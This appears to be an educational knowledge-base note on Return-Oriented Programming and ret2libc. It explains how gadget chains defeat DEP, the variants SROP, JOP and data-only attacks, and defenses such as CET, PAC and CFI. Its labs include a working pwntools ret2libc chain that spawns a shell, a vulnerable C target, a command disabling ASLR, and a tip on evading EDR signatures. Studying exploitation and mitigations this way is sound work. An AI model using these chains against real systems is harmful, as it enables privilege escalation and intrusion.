ROP and ret2libc

Definition

Return-Oriented Programming (ROP) is the exploitation technique of chaining together small sequences of existing executable code — "gadgets" that end in a ret instruction — to perform arbitrary computation without injecting any new code into the target process. The attacker controls the stack contents (typically via a stack buffer overflow or equivalent control-flow primitive), arranges a sequence of gadget addresses followed by data, and the CPU executes each gadget in turn — each ret pops the next gadget's address off the stack. ret2libc is the simplest ROP variant: instead of micro-op gadgets, the attacker "returns into" full libc functions like system("/bin/sh") to achieve the goal with a single existing-code primitive. ROP exists because DEP/NX made injected shellcode infeasible — ROP and its siblings are the modern foundation of binary exploitation in the post-DEP world.

Why it matters

Before 2003, binary exploitation against a stack overflow was: write shellcode in the buffer, overwrite the saved return address to point at the buffer, run. Every modern operating system disables this in the first year of installation. ROP is what replaced it. Every binary-exploitation engagement against a modern target — Windows, macOS, Linux, iOS, Android, console firmware — uses ROP or one of its successors. Reading exploit write-ups, CTF challenges, or CVE PoCs without a working model of ROP is reading them with critical sections greyed out.

The technique matters as a teaching note for three transferable senior reasons:

ROP made the impossible routine. The 2007 ROP paper (Shacham, "The Geometry of Innocent Flesh on the Bone") showed that any sufficiently large executable, even a few hundred KB of standard libc, contains a Turing-complete set of gadgets. The mitigation (DEP) was not bypassed by finding a hole; it was bypassed by reusing the legitimate code that was already executable. This is the canonical example of a mitigation that defeated the wrong thing.
The cost of code execution is now "find an info leak + chain gadgets" not "write shellcode". Modern exploit research is largely about producing the right primitives to enable ROP: ASLR-defeating info leaks, stack pivots, useful gadgets, sigreturn-oriented chains. The shellcode line of the 1996 exploit became a 50-line ROP-chain construction in the 2026 exploit.
Every mitigation since ROP exists because of ROP. Intel CET shadow stacks, ARM BTI, Clang CFI, Microsoft CFG, and the explosion of CFI variants are all responses to ROP and its descendants. Understanding ROP is understanding why the modern mitigation stack looks the way it does.

This note assumes you have read memory-corruption, stack-buffer-overflow, and exploit-mitigations. It is the technique deep-dive that makes the "defeat DEP" line of those notes concrete.

How it works

ROP reduces to 5 steps:

Obtain a control-flow primitive. Most commonly, a stack-overwrite of the saved return address from a stack buffer overflow. Other primitives — heap corruption that overwrites a function-pointer object, format-string write-to-arbitrary-address, JIT type confusion — also reach the same state: the CPU is about to execute an indirect branch (ret, call rax, jmp [rax]) and the attacker controls the destination.
Locate useful "gadgets". A gadget is a sequence of one to four instructions ending in ret (or in JOP, ending in jmp/call to a register). The attacker scans the target's executable code regions (typically libc, since it's the largest and always loaded) for sequences that perform useful work and end in a control-flow instruction. Tools (ROPgadget, ropper, pwntools' ROP() class) automate this.
Construct the chain. The chain is a sequence of gadget addresses interspersed with data (immediate values, addresses for the gadgets to load). Each gadget performs one small operation (load a register, syscall, push a value) and rets. The ret pops the next gadget's address off the stack and jumps to it. The stack itself is the "ROP program".
Place the chain in memory. Usually written directly onto the stack by the overflow (the chain starts at the saved-RIP location and continues into adjacent stack memory). Alternatively, written to the heap and followed by a stack-pivot gadget (xchg rsp, rax; ret or equivalent) that switches the stack pointer to the heap-located chain.
Trigger execution. When the vulnerable function returns, the first ret pops the first gadget's address and jumps. Each subsequent ret advances the chain. The final gadget typically performs the goal action: execve("/bin/sh", NULL, NULL) via syscall, system("/bin/sh") via libc, mprotect() to mark a region executable and jmp into shellcode there.

A canonical pwntools-shaped ROP chain that calls system("/bin/sh") (ret2libc variant):

from pwn import *

context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")

# Assume we leaked the libc base via a separate primitive (omitted here).
libc.address = LEAKED_LIBC_BASE

# Build the chain: pop rdi (arg), pointer to "/bin/sh", system().
rop = ROP(libc)
rop.raw(rop.find_gadget(["pop rdi", "ret"]))      # gadget 1: set rdi
rop.raw(next(libc.search(b"/bin/sh\0")))          # data: address of "/bin/sh"
rop.raw(libc.symbols["system"])                   # gadget 2: call system

# Overwrite saved RIP with the chain.
OFFSET = 72   # from cyclic-find against the binary
payload = b"A" * OFFSET + rop.chain()

# Trigger.
io = process(elf.path)
io.sendline(payload)
io.interactive()

The bug is not "Linux loads libc into the process"; it is the legitimate code already in the address space is, when chained via control-flow corruption, sufficient to compute anything — and DEP only restricted the location of code, not its reuse.

Techniques / patterns

Use ROPgadget or ropper to enumerate gadgets first. ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | head -50 shows the available primitives. The right gadget for the right register can be 30 seconds of search; the wrong gadget produces a 4-hour rabbit hole.
one_gadget finds shortcuts in libc. one_gadget libc.so.6 searches for single-jump sequences that yield a shell. Each "one-gadget" has constraints — typically register state requirements (e.g., r12 == NULL) — that the attacker must satisfy. When the constraints match the post-overflow register state, the entire ROP chain collapses to one address.
The ret2csu pattern provides universal gadgets in glibc-compiled binaries. __libc_csu_init in any dynamically-linked glibc binary contains a gadget that pops rbx, rbp, r12, r13, r14, r15 plus a controlled call qword ptr [r12+rbx*8]. This single gadget can set arbitrary register state plus an indirect call — a universal building block. Senior exploits routinely use ret2csu when one_gadget doesn't fit.
Stack pivots move the chain off the original stack. When the overflow buffer is too small to hold a full chain, write a pivot gadget (xchg rsp, rax, mov rsp, rax, leave; ret with controlled rbp) that switches the stack pointer to a controllable region (heap, .data, BSS), where the rest of the chain lives.
ROP chains must respect calling conventions. x86-64 System V passes the first six arguments in rdi, rsi, rdx, rcx, r8, r9. The right ROP chain sets these registers before the call gadget. Windows x64 uses rcx, rdx, r8, r9 plus shadow space — different gadget set required.
ASLR must be defeated first. ROP-gadget addresses must be exact. ASLR randomizes libc base per-process; without a libc-leak primitive, the chain doesn't know where its gadgets live. Senior exploitation chains always include an info-leak phase before the ROP phase.
CET defeats classic ROP. Adapt or chain a CET bypass. Modern systems with Intel CET enforce that ret instructions return only to addresses on the shadow stack. Pure ROP fails at the first gadget that wasn't called legitimately. Adaptations: SROP (sigreturn-oriented programming) when the attacker can fake a signal frame; COP (call-oriented programming) targeting indirect-call gadgets that CET-ENDBR permits; CET-bypass techniques specific to the target.
OPSEC: ROP chains leave detectable patterns. EDR products fingerprint common gadget sequences, particularly pop rdi; ret followed by a /bin/sh address followed by system() call. Custom-built chains and uncommon gadgets reduce signature hits but raise development cost.

Variants and bypasses

Code-reuse exploitation has 5 named techniques, each addressing a specific mitigation or constraint.

1. ret2libc (classic)

Return directly into a libc function — system(), execve(), mprotect() + jmp to shellcode. The simplest code-reuse pattern. Predates ROP proper. Works when a single libc call achieves the goal. Defeated by: ASLR (need libc-leak), CET (need indirect-call entry point that's CET-permitted — most libc functions are valid call targets, so this still works for ret2libc), and modern libc hardening (some distros remove the "/bin/sh" string).

2. ROP proper (gadget chaining)

Many small gadgets composed into a chain. Turing-complete on any sufficiently large code region. The modern default. Defeated by: CET shadow stack (every ret checked against the shadow copy), ARM PAC (return addresses signed), strong CFI (only valid landing pads).

3. JOP / COP (jump-oriented / call-oriented programming)

Same idea as ROP but gadgets end in jmp <reg> or call <reg> instead of ret. Doesn't touch the saved return address; bypasses canary and shadow-stack mitigations. Requires a dispatcher gadget that chains the indirect branches. More complex to construct; less common than ROP but the natural successor as CET deploys.

4. SROP (sigreturn-oriented programming)

Linux sigreturn syscall restores full CPU state from a structure on the stack. Attacker who can call sigreturn with attacker-controlled stack can set every register to any value at once. Defeats register-control restrictions and works without finding diverse gadgets — one syscall; ret plus a forged ucontext_t structure is enough.

5. Data-only attacks

Don't corrupt control flow at all. Instead, corrupt data the program reads — flip a is_admin flag, swap a function-pointer table entry that the program legitimately calls, modify environment-variable values that a subsequent execve reads. Defeats CFI and CET entirely because no illegal control flow occurs. Increasingly the modern attack pattern against well-hardened targets.

Impact

Ordered by typical real-world severity:

Arbitrary code execution despite DEP/NX. The defining outcome of ROP. The mitigation that made shellcode infeasible is bypassed; exploitation cost rises but does not become impossible.
Privilege escalation in setuid/setgid binaries. Sudo / passwd / mount / ping with an overflow → ROP chain → setuid(0); execve("/bin/sh"). Local root from a single bug in a privileged binary.
Sandbox-bound RCE. Browser/renderer-process RCE via JIT type confusion → ROP chain → renderer-context code execution. The chain typically continues with a kernel-side bug for sandbox escape.
Persistent ROP-based payloads. Some operational tooling (Cobalt Strike, Meterpreter, custom red-team frameworks) implements fully ROP-based payload execution — no shellcode injection, all logic in chained gadgets — to evade AV/EDR signatures that match on shellcode patterns.
Defense-research utility. ROP chains are also used defensively: by security researchers to test mitigation effectiveness, by Google Project Zero to validate that exploit primitives exist, by hardening teams to drive mitigation requirements.

Detection and defense

Ordered by effectiveness:

Intel CET shadow stack. The architectural defeat of classic ROP. Every ret is checked against a write-protected shadow copy of the return-address stack. A ROP gadget that wasn't reached via a legitimate call produces a mismatch and the CPU traps. Available on Intel Tiger Lake+ and AMD Zen 3+. Linux 6.6+ supports it; Windows 11 has CET enabled by default for compatible binaries.
ARM Pointer Authentication (PAC). The ARM equivalent: return addresses are signed with a per-process key before being stored, verified before use. A corrupted return address fails verification; the CPU traps. Available on ARMv8.3+; Apple A12+ devices and modern Pixel phones ship with PAC enabled.
Control Flow Integrity (CFI). Indirect-call instructions can only target CFI-tagged entry points. Defeats most ROP variants whose final gadgets are indirect calls. Intel IBT (ENDBR enforcement), Clang CFI, MSVC CFG. CFI alone doesn't defeat pure-ret-based ROP (CET shadow stack does that); together they restrict the entire indirect-control-flow surface.
ASLR — make gadget addresses unpredictable. ROP requires exact gadget addresses; ASLR randomizes them per-process. Each ROP chain in a modern exploit must include an info-leak phase. Strong ASLR (high entropy on libc base, executable base, stack, heap, vDSO) imposes per-exploit-chain cost on the info-leak primitive.
Compile-time CFI annotations and link-time ROP-resistance. Clang -fsanitize=cfi and similar flags emit runtime checks on indirect-call targets. RAP (Reuse Attack Protector, originally grsecurity/PaX) inserts compile-time hash checks. Both reduce the available gadget set.
EDR runtime ROP detection. Behavioral signatures on stack contents that look like gadget chains (sequences of executable addresses with no return addresses between them), unusual VirtualProtect / mprotect calls (indicating a "make region executable" step), and ROP gadget patterns in process memory. Layered on top of structural mitigations.

What does not work as a primary defense

"Disable libc." Cannot — the program needs libc. Stripped/static binaries reduce the gadget surface but don't eliminate it (the program's own code provides gadgets).
"Block specific syscalls." Seccomp filters reduce post-exploitation impact but don't prevent the ROP chain from running its earlier gadgets.
AV signature matching on ROP chains. Custom chains and metamorphic gadget selection trivially defeat signature-based detection. The structural defenses (CET, PAC, CFI) are the durable layer.
Trusting "our code is too small to ROP". Shacham's 2007 paper proved that any sufficiently large standard libc (or equivalent dynamic library) contains a Turing-complete gadget set. Reducing the attacker's gadget supply is useful but not protective.

Practical labs

Run only against owned lab environments. Labs use intentionally vulnerable code.

# Lab 1 — Find gadgets in libc.
ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | head -20
ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret" | head -10
# Each line is a candidate gadget for ROP construction.

# Lab 2 — Find one-gadget shortcuts.
# Install one_gadget: gem install one_gadget
one_gadget /lib/x86_64-linux-gnu/libc.so.6
# Output: addresses + constraints. Each one-gadget gives /bin/sh in one jump
# if the listed register-state constraints are met at the time of jump.

# Lab 3 — Build a ret2libc exploit against a vulnerable lab target.
# Target program (compile with PIE off + libc address known for didactic clarity):
cat > vuln.c <<'EOF'
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
    char buf[64];
    if (argc > 1) strcpy(buf, argv[1]);
    return 0;
}
EOF
gcc -fno-stack-protector -no-pie -o vuln vuln.c

# Build exploit:
cat > exploit.py <<'EOF'
from pwn import *
context.binary = elf = ELF("./vuln")
libc = elf.libc

# Without ASLR (for didactic purposes), libc base is fixed:
SYSTEM = libc.symbols["system"]
BINSH  = next(libc.search(b"/bin/sh\0"))
POP_RDI = next(elf.search(asm("pop rdi; ret")))   # find a pop rdi gadget

OFFSET = 72   # cyclic-find offset to saved RIP
chain = b"A" * OFFSET
chain += p64(POP_RDI)
chain += p64(BINSH)
chain += p64(SYSTEM)

io = process([elf.path, chain])
io.interactive()
EOF
sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'  # disable ASLR for lab
python3 exploit.py
# Expected: an interactive /bin/sh shell.

# Lab 4 — Build a ret2csu universal-gadget chain.
# Locate __libc_csu_init in the target binary (pre-glibc-2.34 binaries):
objdump -d ./vuln | grep -A1 "__libc_csu_init" | head -20
# Identify the two ret2csu gadgets:
#   gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
#   gadget 2: mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]
# Use pwntools' RopGadget to build the chain programmatically; see pwntools docs.

# Lab 5 — Inspect Intel CET behavior with a CET-compiled target.
gcc -fcf-protection=full -O2 -o vuln_cet vuln.c
checksec --file=./vuln_cet | grep -i "cet\|shstk"
# If your CPU + kernel support CET, this binary will have shadow stack enforced.
# Reproduce the ROP exploit from Lab 3 and observe:
#   ./vuln_cet "$(python3 exploit.py | head -1)"
# Expected: SIGSEGV with shadow-stack violation in dmesg / journalctl.

# Lab 6 — Defender-side: detect ROP-chain signatures.
# After a ROP exploit fires (in lab), inspect the crash dump:
gdb ./vuln_cet -ex "run < exploit.bin" -ex "bt" -ex quit
# The backtrace shows non-call'd frames — a high-fidelity ROP indicator.
# In an EDR/SIEM pipeline, this corresponds to crash-dump telemetry showing
# a stack that contains executable addresses with no corresponding call frames.

Practical examples

CVE-2021-3156 (Sudo Baron Samedit) exploitation chain. Heap-adjacent stack-style off-by-one yields heap corruption → arbitrary write primitive → ROP chain in heap-allocated memory → stack pivot → setuid(0); execve("/bin/sh"). Despite stack canary + ASLR + PIE, the chain completes. Modern Sudo exploit is multi-stage; the ROP segment is the code-execution finishing move.
Pwn2Own browser chain. Renderer-process JIT type confusion → arbitrary read/write within renderer → libc-base leak → ROP chain in renderer process → renderer-process RCE → escape via Mojo IPC bug → kernel UAF → kernel ROP → SYSTEM. The "renderer ROP" and "kernel ROP" are two of the 4–8 distinct primitives in a typical winning chain.
CTF pwn category — ret2csu under modest hardening. Vulnerable binary has stack canary + PIE + DEP. Operator uses a format-string bug to leak the canary and PIE base, then ROP via the binary's own __libc_csu_init gadgets (no libc leak required — the binary's own code suffices). Demonstrates that PIE + ASLR are defeated by any address leak, regardless of source.
Game-console firmware exploit (homebrew scene). Older console firmware ships without CET. A ROP chain in the embedded webkit-based browser yields userland code execution; subsequent kernel-side ROP yields kernel privileges; chain ends with a payload that installs persistent homebrew. The technique is identical to red-team usage; the goal is benign.
Defender catches ROP via CET. Production Windows 11 box with CET enabled. Attacker delivers a phishing payload that exploits a third-party PDF reader without CET-compat. The PDF-reader process attempts a ROP chain; first illegitimate ret triggers a shadow-stack violation; the OS aborts the process; Windows Defender captures the crash and surfaces a high-confidence "Control Flow Guard violation" alert. The exploit didn't land.

memory-corruption — the bug class that produces the control-flow primitive ROP needs.
stack-buffer-overflow — the canonical primitive source; the "how ROP starts" half of the chain.
exploit-mitigations — the mitigation landscape ROP exists to bypass and that modern ROP-resistant mitigations (CET, PAC, CFI) target.
Attacker-Defender Duality — the duality is starkly clean here: DEP was deployed, ROP was invented; CET was deployed, JOP/COP/SROP emerged. The arms race is the field.
EDR / process correlation — modern EDR detects many ROP attempts via crash-pattern and VirtualProtect anomaly signatures.
Behavioral vs Signature Detection — ROP-chain detection is purely behavioral (control-flow anomaly), not signature-based; custom chains evade signature detection trivially.
Windows Privilege Escalation — kernel ROP is one of the listed kernel-exploit privesc paths; the technique spans userspace and kernel.

Suggested future atomic notes

srop-and-sigreturn-oriented-programming — variant 4 deep dive.
jop-cop-and-data-only-attacks — variant 3 + 5 deep dive; the modern bypass classes against CET.
stack-pivots-and-large-rop-chains — the small-buffer / heap-located-chain pattern.
one-gadget-and-libc-shortcuts — practical exploit-development on the libc side.
ropgadget-ropper-pwntools-rop-class — the tooling deep dive.
cet-and-shadow-stacks-in-depth — the architectural defeat of pure ROP.
bring-your-own-vulnerable-driver — the kernel-equivalent of code-reuse: load an attacker-friendly driver to get arbitrary kernel R/W.

References

Foundational: Hovav Shacham — The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (CCS 2007, the foundational ROP paper) — https://hovav.net/ucsd/dist/geometry.pdf
Foundational: Solar Designer — Getting around non-executable stack (Bugtraq, 1997, the original ret2libc disclosure) — https://seclists.org/bugtraq/1997/Aug/63
Research / Deep Dive: Dennis Andriesse — Practical Binary Analysis (No Starch Press, 2018) — chapters on ROP construction and modern exploitation
Official Tool Docs: pwntools ROP module — https://docs.pwntools.com/en/stable/rop/rop.html
Official Tool Docs: ROPgadget — https://github.com/JonathanSalwan/ROPgadget
Research / Deep Dive: Intel — Control-flow Enforcement Technology (CET) specification — https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

Reference system